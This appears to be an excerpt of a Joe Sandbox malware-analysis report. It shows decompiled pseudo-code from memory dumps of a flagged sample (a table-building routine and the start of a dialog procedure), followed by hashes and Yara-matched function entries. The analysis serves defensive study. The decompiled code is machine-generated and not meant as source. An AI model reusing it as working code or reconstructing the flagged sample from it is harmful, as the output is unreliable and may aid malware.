						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                            0x00407567
                                                                            0x0040756f
                                                                            0x00407573
                                                                            0x00407575
                                                                            0x00407578
                                                                            0x0040757a
                                                                            0x0040757a
                                                                            0x0040757c
                                                                            0x00407583
                                                                            0x00407585
                                                                            0x00407585
                                                                            0x0040758b
                                                                            0x004075a0
                                                                            0x004075a8
                                                                            0x004075aa
                                                                            0x004075ac
                                                                            0x004075af
                                                                            0x004075b0
                                                                            0x004075b0
                                                                            0x004075b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075b8
                                                                            0x004075bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075bb
                                                                            0x004075bf
                                                                            0x004075c2
                                                                            0x004075c4
                                                                            0x004075c4
                                                                            0x004075c7
                                                                            0x004075cd
                                                                            0x004075ce
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075ce
                                                                            0x004075d3
                                                                            0x004075d6
                                                                            0x004075d8
                                                                            0x004075d8
                                                                            0x004075de
                                                                            0x004075e0
                                                                            0x004075f1
                                                                            0x004075e4
                                                                            0x004075e8
                                                                            0x0040788d
                                                                            0x00000000
                                                                            0x0040788d
                                                                            0x004075ee
                                                                            0x004075ef
                                                                            0x004075ef
                                                                            0x004075f7
                                                                            0x004075fa
                                                                            0x004075fe
                                                                            0x00407600
                                                                            0x00407602
                                                                            0x00407605
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040760d
                                                                            0x00407613
                                                                            0x00407615
                                                                            0x00407617
                                                                            0x00407618
                                                                            0x0040762d
                                                                            0x0040762d
                                                                            0x00407630
                                                                            0x00407632
                                                                            0x00407632
                                                                            0x00407634
                                                                            0x00407639
                                                                            0x0040763b
                                                                            0x00407642
                                                                            0x00407644
                                                                            0x0040764c
                                                                            0x0040764c
                                                                            0x0040764e
                                                                            0x0040764f
                                                                            0x0040765e
                                                                            0x00407662
                                                                            0x00407666
                                                                            0x00407669
                                                                            0x0040766c
                                                                            0x00407671
                                                                            0x00407674
                                                                            0x0040767a
                                                                            0x00407681
                                                                            0x00407687
                                                                            0x00407880
                                                                            0x00407880
                                                                            0x00407885
                                                                            0x00407894
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407885
                                                                            0x00407694
                                                                            0x00407697
                                                                            0x0040769a
                                                                            0x0040769d
                                                                            0x004076a1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076ac
                                                                            0x004076af
                                                                            0x004076b0
                                                                            0x004076b2
                                                                            0x004076b8
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076c1
                                                                            0x004076c2
                                                                            0x004076c5
                                                                            0x004076c8
                                                                            0x004076cb
                                                                            0x004076d1
                                                                            0x004076d3
                                                                            0x004076d3
                                                                            0x004076db
                                                                            0x004076df
                                                                            0x004076e4
                                                                            0x00407709
                                                                            0x0040770f
                                                                            0x00407711
                                                                            0x00407713
                                                                            0x00407716
                                                                            0x0040771f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076e6
                                                                            0x004076e6
                                                                            0x004076ef
                                                                            0x004076f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407704
                                                                            0x00407704
                                                                            0x00407707
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076f7
                                                                            0x004076fa
                                                                            0x004076fc
                                                                            0x00407700
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407702
                                                                            0x00407702
                                                                            0x00000000
                                                                            0x00407704
                                                                            0x00407728
                                                                            0x0040772e
                                                                            0x00407738
                                                                            0x0040773a
                                                                            0x0040773f
                                                                            0x00407741
                                                                            0x00407777
                                                                            0x00407743
                                                                            0x00407743
                                                                            0x00407746
                                                                            0x00407749
                                                                            0x00407753
                                                                            0x00407756
                                                                            0x0040775d
                                                                            0x00407768
                                                                            0x0040776f
                                                                            0x0040776f
                                                                            0x00407779
                                                                            0x0040777c
                                                                            0x0040777e
                                                                            0x00407784
                                                                            0x00407784
                                                                            0x0040778d
                                                                            0x00407790
                                                                            0x00407795
                                                                            0x004077a4
                                                                            0x004077ac
                                                                            0x004077b1
                                                                            0x004077d5
                                                                            0x004077dd
                                                                            0x004077e1
                                                                            0x004077e7
                                                                            0x004077b3
                                                                            0x004077c1
                                                                            0x004077c4
                                                                            0x004077ca
                                                                            0x004077ca
                                                                            0x004077eb
                                                                            0x004077a6
                                                                            0x004077a6
                                                                            0x004077a6
                                                                            0x004077fc
                                                                            0x00407800
                                                                            0x0040780c
                                                                            0x00407807
                                                                            0x0040780a
                                                                            0x0040780a
                                                                            0x00407814
                                                                            0x00407819
                                                                            0x00407821
                                                                            0x0040781d
                                                                            0x0040781f
                                                                            0x0040781f
                                                                            0x00407827
                                                                            0x00407829
                                                                            0x00407830
                                                                            0x0040783a
                                                                            0x00407844
                                                                            0x00407860
                                                                            0x00407864
                                                                            0x004076a9
                                                                            0x004076af
                                                                            0x004076b0
                                                                            0x004076b2
                                                                            0x004076b8
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004076bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407846
                                                                            0x00407846
                                                                            0x00407846
                                                                            0x0040784b
                                                                            0x00407854
                                                                            0x0040785d
                                                                            0x00000000
                                                                            0x0040785d
                                                                            0x0040786a
                                                                            0x0040786a
                                                                            0x0040786d
                                                                            0x00407874
                                                                            0x00407877
                                                                            0x00000000
                                                                            0x0040769a
                                                                            0x0040761a
                                                                            0x0040761c
                                                                            0x0040761c
                                                                            0x00407620
                                                                            0x00407623
                                                                            0x00407624
                                                                            0x00407624
                                                                            0x00000000
                                                                            0x0040761c
                                                                            0x00407590
                                                                            0x00407596
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEC23 Relevance: .3, Instructions: 274COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5918e56615677b8c360487947ec1ce1d761ac5fca8099dd6596a679b7b29a937
                                                                            • Instruction ID: 40f6e0bc0b31222a7e5cfc03d06a34c098e045bc48519f2e5e3589d6ae6743ab
                                                                            • Opcode Fuzzy Hash: 5918e56615677b8c360487947ec1ce1d761ac5fca8099dd6596a679b7b29a937
                                                                            • Instruction Fuzzy Hash: 25A17672A043459FCB348E38CD947EA7BB6EF58320F95442ECC89DB205D7318A85CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAECBE Relevance: .3, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f71099804d913c32928c0fe6350b84363ee15a4866d40c1b3e3f42295df0fd9b
                                                                            • Instruction ID: fb1fe970ea97bf3fc13e143ceb28b541588572756ae5c131269eb78cd80a3809
                                                                            • Opcode Fuzzy Hash: f71099804d913c32928c0fe6350b84363ee15a4866d40c1b3e3f42295df0fd9b
                                                                            • Instruction Fuzzy Hash: DB916772A04345AFCB348E38CD947DE3BB6EF58350F95452ACC89DB205D7319A85CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAED77 Relevance: .2, Instructions: 248COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b5d11c436569e96608d85df2536632ad85c1b8f2051283883f8d0cee289ac1b0
                                                                            • Instruction ID: 7db8c0040f28e46a5f459b5f5fdefd7d30344ee41b959d27d5dace0895838e19
                                                                            • Opcode Fuzzy Hash: b5d11c436569e96608d85df2536632ad85c1b8f2051283883f8d0cee289ac1b0
                                                                            • Instruction Fuzzy Hash: 81915572A043559FCB348F38CD847DA7BB6EF18310F58452ACC89DB60AD7319989CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEE0E Relevance: .2, Instructions: 208COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d6c60c81196a36d4ee626c42df6edcb209828924915292161661ae29d23e9dea
                                                                            • Instruction ID: bb98d3526f9400860d274fbdf51c9f25e4547a25e8f0be05cb544ac82158e5de
                                                                            • Opcode Fuzzy Hash: d6c60c81196a36d4ee626c42df6edcb209828924915292161661ae29d23e9dea
                                                                            • Instruction Fuzzy Hash: 72717672A043559FDB348E38CD947DE7BB6EF18350F54442ACC89DB209D7329A45CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEECD Relevance: .2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67463671adf0d11ea492ac599d16601512edd1985faf09781f19e35a9fc681bc
                                                                            • Instruction ID: 47530739a3d3a01b134b8c1620f42258bbdab70d8ac9c6db4c1d0bb93c7b03eb
                                                                            • Opcode Fuzzy Hash: 67463671adf0d11ea492ac599d16601512edd1985faf09781f19e35a9fc681bc
                                                                            • Instruction Fuzzy Hash: D1512671A043459FDB34CE38CDD4BDA7BB6AF58350F54442ACC89DB20AE7319A85CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB292D Relevance: .2, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e2611d87cc7c7dc30728de8f66c13abcdf382520d0cd7de3d51707d4dea10dca
                                                                            • Instruction ID: 6391e958b5131d65d13336b5ccdd7939efed687b63b8d9e4b86e74f8a7a4a63c
                                                                            • Opcode Fuzzy Hash: e2611d87cc7c7dc30728de8f66c13abcdf382520d0cd7de3d51707d4dea10dca
                                                                            • Instruction Fuzzy Hash: 93512576A057499BDB30CE2ACE903D773F7AF9A340F95462BCD498B205DB30A541CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEFFF Relevance: .2, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a6fc25826ebdeabcd6f8bf51c493c78befe01e1405fcd9baf15ad7870bb872e5
                                                                            • Instruction ID: 519cc525a718cd2004368535f121b938bf8afc236c69dae8f2344837f41cf5ff
                                                                            • Opcode Fuzzy Hash: a6fc25826ebdeabcd6f8bf51c493c78befe01e1405fcd9baf15ad7870bb872e5
                                                                            • Instruction Fuzzy Hash: EA5167716043459FDB348E38CDD4BEA7BA2EF54350F54852ACC89DB605EB32C986CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAEF79 Relevance: .2, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85bdd0b2b523768326db44f6e6b848a90b9c70bbc660d5e89207704ff685dc35
                                                                            • Instruction ID: 70a9be3e6d27893cc083ba3b2c57b907891268ac80127410f5d49da0a932001d
                                                                            • Opcode Fuzzy Hash: 85bdd0b2b523768326db44f6e6b848a90b9c70bbc660d5e89207704ff685dc35
                                                                            • Instruction Fuzzy Hash: D6516772A043459FDB35CE38CDD0BDA7BA2AF54350F54452ACC89DF20AE7318985CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB82A1 Relevance: .1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateCreateFileMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2773895085-0
                                                                            • Opcode ID: 9151fce2be6fdba489c8ee6693e1275309be05722822fd4d14b2503f1cb77901
                                                                            • Instruction ID: c47b59cf816aae178c2f795da8878eb77bc1fc4efac141d39a62c788f574ec99
                                                                            • Opcode Fuzzy Hash: 9151fce2be6fdba489c8ee6693e1275309be05722822fd4d14b2503f1cb77901
                                                                            • Instruction Fuzzy Hash: B9417A31408345CFCB2A9F35CAA87DABFBAEF42210F5A055EC99A4B513C734A50ACB45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AAF047 Relevance: .1, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 45d72c2ea81c416f657c7b9c36ff319a019f3c76699f710b1c5a87b8dbbf7e55
                                                                            • Instruction ID: b16fde7487e1fc2a39f99594aa557931f7b8a259f0c3fd93e9db378dab4d044d
                                                                            • Opcode Fuzzy Hash: 45d72c2ea81c416f657c7b9c36ff319a019f3c76699f710b1c5a87b8dbbf7e55
                                                                            • Instruction Fuzzy Hash: 79419B726003099FDB349E34CD91BDB77B69F94350F91841ACC88DB619E7318941CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ABAB40 Relevance: .1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e510fb5b74e85527a53c43d9148d9a6a7748a026435ec43ed8784dd9a4af0e13
                                                                            • Instruction ID: c655897a9884f90183266f59dcf15032d29c03e5e1e20476c0d71076c03fc317
                                                                            • Opcode Fuzzy Hash: e510fb5b74e85527a53c43d9148d9a6a7748a026435ec43ed8784dd9a4af0e13
                                                                            • Instruction Fuzzy Hash: 5B210A742047858FDF366FB889A9BEB37BAAF92311F94451DCE8646153DF314180CA02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB9758 Relevance: .1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bca9124bd2d20192265ce0062393ae5780a87d1bfc5cb739612a81dee57caa35
                                                                            • Instruction ID: 9e133c535253aa7767d7ca4b17a13b41617cf2d6e9c056c2aed6f9e323cecddc
                                                                            • Opcode Fuzzy Hash: bca9124bd2d20192265ce0062393ae5780a87d1bfc5cb739612a81dee57caa35
                                                                            • Instruction Fuzzy Hash: 5221D53AA04347DFCF215FB989D03D723F5BF6A740B454539DA898B602E6304845CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB98FA Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 92ea8acae18668ccd999d37d1e28f26e67e60cd3f25efc90d0623c4c44325e01
                                                                            • Instruction ID: 8ab205229a8535f88c51c5c2947e7c7e990605baee3580686d6326d6f65408a3
                                                                            • Opcode Fuzzy Hash: 92ea8acae18668ccd999d37d1e28f26e67e60cd3f25efc90d0623c4c44325e01
                                                                            • Instruction Fuzzy Hash: 0911AD726042998FCB32CF28C8C0BDAB3E6BF99750F560056C9089F262C771EA40CF00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB904B Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1641ab4e12fec9db194faaa35db61c0d39d9d5f554b339aba574eb12cb6c34bb
                                                                            • Instruction ID: d357c2a76bb8dc00eac886c5ab4f22a8e2ed006b8ab7f45a43492be56cf398d7
                                                                            • Opcode Fuzzy Hash: 1641ab4e12fec9db194faaa35db61c0d39d9d5f554b339aba574eb12cb6c34bb
                                                                            • Instruction Fuzzy Hash: 52B09234210A408FCE49CA0DC1D0E44B3B2BF44A80B414490E4028BB21C324E800CA00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
